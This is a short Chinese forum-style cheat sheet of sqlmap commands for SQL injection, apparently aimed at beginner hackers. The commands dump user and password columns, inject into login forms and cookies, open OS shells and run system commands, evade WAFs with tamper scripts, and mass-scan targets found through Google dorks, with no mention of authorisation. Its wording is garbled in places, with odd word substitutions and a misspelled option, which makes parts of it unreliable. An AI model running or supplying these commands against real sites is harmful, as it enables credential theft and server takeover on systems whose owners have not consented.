SqlMap简单SQL注入

各大论坛常有许多sql注入圣器，但现还有的也不太好用了如啊D,明小子，御剑，只有御剑還是很非常好的。

如今给大伙儿推介某些大神常常用的引入圣器SQLmap（sql枚举数据表）坚信许多小黑客都还不了解或是不知道。 

你在因为我也不漫谈他的用途终究搜狗网有道具能够在BT5的中文网去下载

如今却说一会儿他的某些指令使用方法：

Mysql数据库引入:

sqlmap -u "url" --dbs

sqlmap -u "url" -D 数据表 --tables

sqlmap -u "url" -D 数据表 -T 表段 --columns

sqlmap -u "url" -D 数据表 -T 表段 -C id,user,pass --dump

--------------------------------------------------------------------------

Post登录框引入:

./sqlmap.py -r *.txt -p tfUPass

sqlmap -u url --forms

sqlmap -u url "tfUName=1(若为随意数)&tfUPass=1(若为随意数)"

--------------------------------------------------------------------------

伪静态引入:

sqlmap -u url/x*.html --dbs

---------------------------------------------------------------------------

互动写shell及指令实行:

cmdshell:

sqlmap -u url --os-shell

特定站名种类.1.asp 2.aspx 3.jsp 4.php(default)

特定站名主目录:盘符/文件名/

指令实行:

sqlmap -u url --os-cmd=ipconfig

特定站名种类.1.asp 2.aspx 3.jsp 4.php(default)

特定站名主目录:盘符/文件名/

--------------------------------------------------------------------------

Cookie引入:

sqlmap -u "url" --cookie "id=" --table --level 2

sqlmap -u "url" --cookie "id=" --clumns -T 表段 --level 2

sqlmap -u "url" --cookie "id=" --dump -T 表段 -C "user,pass" --level 2

--------------------------------------------------------------------------

恳求廷时引入:

sqlmap --dbs -u usr/x*.html --delay 1(時间,可随便)

sqlmap --dbs -u usr/x*.html --safe-freq 1(频次,可随便)

--------------------------------------------------------------------------

绕开WAF防火墙:

sqlmap -u url -v 3 --dbs --batch --tamper "space2morehash.py"

1.space2hash.py 2.base64encode.py 3.charencode.py

--------------------------------------------------------------------------

Google成批检验引入:

sqlmap -g 关键字

不明白不要紧  百度是你最合适的教师。